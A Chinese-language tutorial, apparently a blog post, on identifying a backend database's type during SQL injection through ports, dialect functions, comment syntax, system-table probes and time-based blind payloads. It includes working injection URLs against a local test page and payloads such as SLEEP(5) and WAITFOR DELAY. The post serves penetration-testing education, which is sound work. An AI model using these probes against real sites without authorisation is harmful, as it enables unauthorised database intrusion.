SQL注入如何判断数据库类型

前言

在进行SQL注入之前,首先应该判断数据库的类型,不同的数据库在处理一些函数的时候会有一些微妙的差别,只有判断出是哪种数据库类型,这样才能根据数据库的类型选择合适的函数,更容易实现SQL注入。

# 前端与数据库类型

复制代码
asp:SQL Server,Access

.net:SQL Server

php:MySQL,PostgreSQL

java:Oracle,MySQL

# 根据端口判断

复制代码
Oracle:默认端口 1521

SQL Server:默认端口 1433

MySQL:默认端口 3306

# 根据数据库特有函数来判断

# len和length

复制代码
len():SQL Server 、MySQL以及db2返回长度的函数。

length():Oracle和INFORMIX返回长度的函数。

# version和@@version

复制代码
version():MySQL查询版本信息的函数

@@version:MySQL和SQL Server查询版本信息的函数

# substring和substr

复制代码
MySQL两个函数都可以使用

Oracle只可调用substr

SQL Server只可调用substring

# 根据特殊符号进行判断

复制代码
/* 是MySQL数据库的注释符

-- 是Oracle和SQL Server支持的注释符

;  是子句查询标识符,Oracle不支持多行查询,若返回错误,则说明可能是Oracle数据库

#  是MySQL中的注释符,返回错误则说明可能不是MySQL,另外也支持-- 和/**/

# 根据数据库对字符串的处理方式判断

# MySQL

复制代码
http://127.0.0.1/test.php?id=1 and 'a'+'b'='ab' 

http://127.0.0.1/test.php?id=1 and CONCAT('a','b')='ab'

# Oracle

复制代码
http://127.0.0.1/test.php?id=1 and 'a'||'b'='ab'

http://127.0.0.1/test.php?id=1 and CONCAT('a','b')='ab' 

# SQL Server

复制代码
http://127.0.0.1/test.php?id=1 and 'a'+'b'='ab' 

# 根据数据库特有的数据表来判断

# MySQL(version>5.0)

复制代码
http://127.0.0.1/test.php?id=1 and (select count(*) from information_schema.TABLES)>0 and 1=1

# Oracle

复制代码
http://127.0.0.1/test.php?id=1 and (select count(*) from sys.user_tables)>0 and 1=1

# SQL Server

复制代码
http://127.0.0.1/test.php?id=1 and (select count(*) from sysobjects)>0 and 1=1

# 根据盲注特别函数判断

# MySQL

复制代码
BENCHMARK(1000000,ENCODE('QWE','ASD'))

SLEEP(5)

# PostgreSQL

复制代码
PG_SLEEP(5)

GENERATE_SERIES(1,1000000)

# SQL Server

复制代码
WAITFOR DELAY '0:0:5'
相关推荐
isNotNullX3 分钟前
实时数仓和离线数仓还分不清楚?看完就懂了
大数据·数据库·数据仓库·人工智能·数据分析
怀君8 分钟前
Flutter——数据库Drift开发详细教程之迁移(九)
数据库·flutter
周杰伦的稻香8 分钟前
mysql_multi多实例管理
数据库·mysql
kk在加油17 分钟前
Redis基础数据结构
数据结构·数据库·redis
只有干货26 分钟前
dexie 前端数据库封装
数据库
HardCodeV1 小时前
NestJS
数据库·oracle
花好月圆春祺夏安1 小时前
基于odoo17的设计模式详解---备忘模式
数据库·设计模式
有想法的py工程师2 小时前
PostgreSQL 查询库中所有表占用磁盘大小、表大小
数据库·postgresql
周某人姓周3 小时前
搭建渗透测试环境
网络安全·网络攻击模型
R_AirMan3 小时前
深入浅出Redis:一文掌握Redis底层数据结构与实现原理
java·数据结构·数据库·redis